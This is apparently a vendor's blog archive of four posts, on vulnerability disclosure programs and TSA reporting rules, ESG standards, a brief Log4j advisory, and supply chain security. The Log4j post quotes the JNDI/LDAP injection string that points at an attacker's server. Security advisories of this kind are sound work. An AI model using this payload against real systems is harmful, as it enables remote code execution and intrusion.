fbpx

Monthly Archives: December 2021

All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

Findings VDP | All you’ve ever wanted to know about Vulnerability Disclosure Programs (VDPs)

Once upon a time, software security vulnerabilities were something that businesses usually discussed only internally. The outside world didn’t have to know when risks emerged within a company’s IT systems.

 Those days are over. Today, businesses face increasing pressure to disclose vulnerabilities publicly via the procedures laid out in a Vulnerability Disclosure Program (VDP). VDPs define the process by which organizations share information with external stakeholders about vulnerability discovery, assessment, and remediation.

Although VDPs remain optional in most cases, regulatory agencies have begun to encourage them strongly. In the United States, the Cybersecurity & Infrastructure Security Agency (CISA) has developed a platform to help federal agencies manage VDPs. VDPs can also be helpful in meeting the requirements of compliance frameworks like the GDPR, which — although it does not mandate VDPs specifically — includes requirements regarding the disclosure of breaches.

All of the above is to say that if your business doesn’t yet have a VDP in place, now is a good time to start planning for one. This article explains how to do so by discussing how VDPs work, identifying their benefits, and outlining how to manage disclosures about vulnerabilities.

Third-party vendor security stakeholders

The main purpose of a VDP is to ensure that third-party stakeholders know when vulnerabilities that exist within your business’s IT estate may affect them. In general, there are four main types of stakeholders to consider in this regard: 

  • Users: People who use your software may be impacted by security flaws within that software.
  • Vendors: Software suppliers often need to know about vulnerabilities so they can take steps to mitigate the vulnerabilities’ exploitation within the products they offer.
  • Finders: Finders are people whose job is to report and track vulnerabilities through, for example, public vulnerability databases. Disclosing vulnerabilities to them ensures that they can alert others to the existence of software flaws that may exist in their own IT estates.
  • Coordinators: Coordinators manage the disclosure and mitigation of vulnerabilities by ensuring that vendors are aware of and address the vulnerabilities identified by finders.

Some of these stakeholders, such as users, are “downstream,” meaning they receive products and services from you. Others, like vendors, are “upstream” stakeholders that supply to you. Both types of stakeholders often need to know about vulnerabilities.

Not every vulnerability needs to be disclosed to every stakeholder. VDPs should define procedures that spell out who requires disclosure about which types of risks.

When defining VDP disclosure policies for your organization, consider factors such as:

  • Is disclosure legally required? Obviously, if there is a specific mandate to disclose information, then you need to disclose it.
  • How many vendors are impacted? If you can confirm that a vulnerability only affects one or two vendors, you may not need to disclose it to every vendor. But if it affects hundreds of vendors or thousands of users, broad disclosure is more warranted, because it will help affected stakeholders to mitigate their risks.
  • How transparent are your vendors? If you report a vulnerability to one of your vendors, will that vendor report the issue to other clients, and/or to finders and coordinators? If not, you have a stronger incentive to disclose the vulnerability to finders and coordinators yourself so that the issue can be mitigated.
  • How important is the vulnerability to your supply chain? The importance of a given vendor to your supply chain can vary widely, after all, supply chain management comes with its own challenges. From the perspective of your business’s own security, disclosures are most critical when they involve key vendors.

Vendor security disclosure requirements

When in doubt about what to disclose, consider the following guidelines to help you decide:

  • What is your relationship? Does the risk involve a strategic alliance partner or a minor supplier? The more important your relationship to the affected organization, the more important it is to disclose the risk.
  • Insurance considerations: In some cases, insurance policies may require you to disclose risks.
  • Legal obligations: Likewise, laws may mandate disclosures in some cases. Remember, too, that laws can change, so be sure to keep up-to-date about regulatory disclosure requirements that impact your business.
  • Risk management: Your decision about what to disclose should be part of a broader third-party risk management strategy that covers your distributors, resellers, and other supply stakeholders. You can make the most accurate decisions about disclosure when you make those decisions within the broader context of risk management.

If you find it difficult to answer questions like these, you can gain clarity by performing an audit of your vendors. Audits allow you to assess the role that each vendor plays in your supply chain.

Latest disclosure requirements from the Transportation Security Administration (TSA)

On the 2nd December 2021 the  DHS’s Transportation Security Administration (TSA) announced  two new Security Directives and additional guidance for voluntary measures. These are intended to strengthen cybersecurity across the transportation sector in response to the ongoing cybersecurity threat to surface transportation systems and associated infrastructure. 

 They include the following requirements:

  1. Report all cybersecurity incidents to CISA within 24 hours.
  2. Designate a cybersecurity coordinator available to TSA and CISA 24/7.
  3. Develop and implement a cybersecurity incident response plan to reduce the risk of an operational disruption should their IT and/or OT systems be affected by a cybersecurity incident.

Complete a cybersecurity vulnerability assessment to identify potential gaps or vulnerabilities in their IT/OT systems.

“These new cybersecurity requirements and recommendations will help keep the traveling public safe and protect our critical infrastructure from evolving threats,” reported Secretary of Homeland Security Alejandro N. Mayorkas. 

The best supply chain is a transparent supply chain

Although it’s certainly not the case that every vulnerability needs to be disclosed to every stakeholder, it is generally a good idea to err on the side of disclosure when defining VDP policies.

The reason why is simple: Disclosures help to ensure transparency within your supply chain, and businesses that have a transparent supply chain are in a better position to protect their own interests, as well as those of their partners and users.

When you don’t operate transparently, your reputation is likely to take a much bigger hit in the event that a major vulnerability emerges and it comes to light that you failed to disclose it. As a  supply chain aggregator, disclosure helps your vendors fix vulnerabilities as quickly as possible, which in turn means that you can keep using their products without worrying about security risks.

The future of vendor disclosure

VDPs may remain optional in most cases today, but the writing is on the wall: In the future, VDPs will very likely become an expectation due not just to government regulation, but also to standards set by businesses in various industries.

This means that every vendor and every customer will require an efficient way of notifying both downstream and upstream stakeholders when security events occur. VDP programs allow this by defining ahead of time exactly what to disclose, whom to disclose it to and how to disclose it.

To manage VDPs effectively, you need automation and comprehensive visibility on your side. Findings provides those benefits by allowing businesses to discover and report on security issues automatically, then disclose them to third parties within the supply chain. The result is a stronger collaboration with stakeholders, as well as increased ability to stop cyber threats.

See for yourself by signing up for a free Findings trial.

How to supercharge your business by applying easy-to-use ESG standards

supercharge your business With easy-to-use ESG standards

Maintaining a healthy, functional supply chain is hard! These days, new standards, regulatory compliance, and different investors’ agendas even make it harder.

No wonder ESG standards and reporting might get sidelined.

The question arises though, why should you care about ESG?  With proven operation cost reduction and increased profits when energy and water efficiency programs are being executed, there is no doubt that practicing sustainability and contributing to the global effort comes with benefits.

With COP26 behind us, it seems a great idea to build a proper ESG program to attract quality investors, and save time and resources. 

The truth is, anyone can start – here are some tips on how to supercharge your business just by applying easy to use ESG standards and attract more investors while you are at it . . .

1) Increase supply chain transparency

The first step for any company looking to improve its ESG performance is ensuring that supply chain partners are held accountable for potential risks and issues before they have a chance to get out of hand. The best way to do that is through what’s known as enterprise-wide sustainability reporting. This entails making all supply chain players aware of their individual responsibilities, as well as providing them with an avenue to report incidents or emerging risks in real-time. In addition, supply chains should be equipped with systems designed to monitor critical environmental and social factors like natural resource depletion, waste management, and human rights abuses, among others. Supply chain partners must then work together on finding solutions to each issue identified. As these partnerships form, companies will begin to see both short-term cost savings and long-term profit opportunities stemming from more efficient operations—ultimately helping them maximize their supply chain security even further down the line.

2) Improve risk management

A platform designed to report on sustainability and supply chain risks can be a useful tool for businesses looking to improve their risk management. A dedicated platform allows users to integrate multiple data sources, visualize insights and make adjustments based on new information. The integration of supply chain data, for example, can be a powerful way for companies to gain visibility into their products’ journey from end to end. For those who prioritize social responsibility in their purchasing decisions, a platform that reports on supplier performance across key sustainable development goals (SDGs) such as climate change mitigation and gender equality is increasingly important. Accessing industry-wide knowledge around issues such as human rights or environmental protection is another valuable aspect of supply chain reporting platforms. Transparency fosters accountability and public awareness; it also gives supply chains with already strong track records a competitive advantage when it comes to attracting high-quality suppliers. Companies who demonstrate they are committed to responsible sourcing will have an easier time attracting more responsible partners along their supply chains.

3) Attract investors

It’s about time for more businesses to begin implementing ESG strategies. Implementing these strategies will not only help attract investors, but it can also make your supply chain more secure, which is something that every company wants. Applying simple and effective ESG strategies doesn’t require a lot of work—you simply need to develop a reporting platform and tell your story in a way that makes sense to potential investors. For example, if you are a farm-to-table food supplier who takes pride in how you grow to produce and how you treat employees well, you should be telling those stories on social media platforms and on your website; then, be sure to include them when speaking with potential clients or investors. If a supply chain disaster occurs at one of your facilities or there’s an outbreak of food-borne illness associated with one of your products, tell investors why you decided to implement certain ESG principles before things went wrong. The results might surprise you!

Applying ESG standards is a win-win

It may reduce supply chain risk and exposure, attract more investors and employees, and in case of a crisis it shows that you have nothing to hide. Most importantly: It makes sense for every company. Why? Because environmental, social and governance issues are often systemic issues. And these kinds of problems need systemic solutions. If we want supply chains that are more resilient in case of a crisis or an economic downturn, then companies must take action today!

Want to know how it can be easily done? Learn more here

What is Log4j vulnerability? Do you need to worry?

Findings VDP | log4j mitigation

Log4j vulnerability,  CVE-2021-44228, became public on December 9, 2021.

This easily triggered log4j vulnerability can be used to gain RCE (remote code execution) in vulnerable systems when the Apache Log4j utility is used. Other Apache products are vulnerable as well, such as Apache Solr.

 

Log4j is easily triggered just by log a special string {jndi:ldap://<attacker’s server>/a}; it impacts Apache Log4j version 2.0-beta9 to 2.15.0-rc, and is common in enterprise software and cloud servers across industry. Unless fixed, it enables easy access to internal networks that can end up with valuable data theft, malware implementation, crucial information deletion, and more.

 

This vulnerability is so critical, that it received the rare 10 out of 10 CVSS scores.

 

Fortunately, not everyone is affected, and mitigation can be easily applied, but first, it is recommended to check if you have been exposed to log4j easily, using Findings’ log4j free VDaaS tool.

 

For more information, feel free to visit our log4j information page

A Complete Checklist To Supply Chain Security

A complete checklist for supply chain security | Findings - Supply Chain Security Automation

Cybersecurity compliance frameworks and standards are a great starting point for managing supply chain security risks. But if your security strategy hinges solely on frameworks, you’re doing it wrong.

As The Cybersecurity Place puts it, “compliance alone won’t save you” from modern security risks.

Indeed, while embracing a cybersecurity framework is an important — and, for many organizations, necessary — first step toward securing the supply chain, businesses shoot themselves in the foot if they stop with framework adoption alone. No matter which framework you use internally, or which frameworks you require your vendors to comply with, the framework on its own is of limited value. You must also implement processes that actually operationalize the framework, allowing you to enforce compliance among your vendors.

Let’s take a look at what goes into a complete supply chain security strategy. As we’ll see, it starts with cybersecurity frameworks like NIST and ENISA, but it extends far beyond those frameworks alone.

The core components of a cybersecurity framework: The NIST example

Cybersecurity frameworks are an excellent foundation that helps businesses define overarching supply chain security principles.

For example, the NIST framework, which is popular among U.S. companies (European companies tend to use ENISA, which is similar to NIST), defines rules designed to help businesses achieve four key goals:

  • Identify: NIST requires processes that allow organizations to identify and understand their cybersecurity risks.
  • Protect: After risks have been identified, NIST requires businesses to take steps to mitigate them in order to improve their cybersecurity posture.
  • Detect: As not all risks can be identified and mitigated, NIST also requires ongoing efforts to detect active threats.
  • Respond: When active threats have been detected, NIST requires responses that can contain and eliminate them.

By adopting a framework like NIST or ENISA, then, businesses gain a high-level architecture that helps them plan a cybersecurity strategy.

Processing tools for supply chain security

The main limitation of frameworks alone is that they provide little if any specific guidance on how to turn high-level cybersecurity principles into practice. As a result, businesses also need to implement security processing tools that allow them to operationalize cybersecurity practices in ways that align with framework requirements.

Processing tools do this in the context of supply chain security by providing:

  • Vulnerability assessment: Processing tools identify risks within the products and services that third-party vendors supply to a business.
  • Coverage assessment: Processing tools help identify situations where vendors lack effective cybersecurity coverage.
  • Visibility assessment: Processing tools enable businesses to profile their vendors and suppliers in order to understand which risks exist within their systems — and which risks could, by extension, flow down the supply chain.
  • Business alignment: With processing tools, businesses can determine which risks in the supply chain pose the greatest threats to their operations. This context is essential because not all vendors and risks are of equal importance within a supply chain.

By providing this functionality in an automated way, processing tools go far in closing the gap between principle and practice. Indeed, as the SANS Institute says, automation is the only way to enforce security compliance mandates in complicated contexts like supply chains.

Managing contractual requirements

What do you do when processing tools reveal that vendors are not fully adhering to your cybersecurity requirements?

That’s where contracts and evidence come into play. Companies must maintain documents and signatures related to the security frameworks they adopt within their supply chains, then use them to enforce compliance when violations occur. Contracts also play an important role in determining which disclosures are required in the event of a supply chain breach.

Remember to update your contracts if, for example, you adopt a newer version of a cybersecurity framework or change your supply chain in a way that imposes new compliance requirements or verifications.

Most large organizations manage contractual requirements through a dedicated security team or CISO. At smaller organizations, a procurement team or IT team typically handles this responsibility. Your specific approach to vendor contract management is not as important as ensuring there is a systematic process in place for defining and enforcing contractual security agreements across your supply chain.

Supply chain security management: Responding to a crisis

The final key step in managing supply chain risks is having a plan in place to respond to incidents when they occur. You don’t want to wait for a breach to decide what to disclose, or how to contain the threat and so on.

Your response plan should define the following points:

  • Who will perform which tasks in response to an incident. Remember that many incidents require responses not just from technical stakeholders, but from other departments such as the legal, PR and others.
  • Which vendors you will use as a backup in the event that one key vendor is breached.
  • How the response will be documented.
  • How you will determine whether public disclosure of a breach is required, and how you will manage that disclosure.

In addition to developing a response plan, run drills so that your team can practice responding to a supply chain breach, before a real-life incident occurs. You should also strive to keep your team focused on the big picture. As you can’t predict the exact nature of a breach, it’s best to learn how to think holistically and creatively about managing incidents, rather than investing in rote reaction plans that may be too specific to apply to a given incident.

Last but not least, ensure that you have a response plan that will allow you to react quickly and effectively when a major security incident occurs within your supply chain. Your goal should be to resolve the incident in a way that protects your operations, customers and reputation, while also demonstrating to partners that supply chain security is a key priority.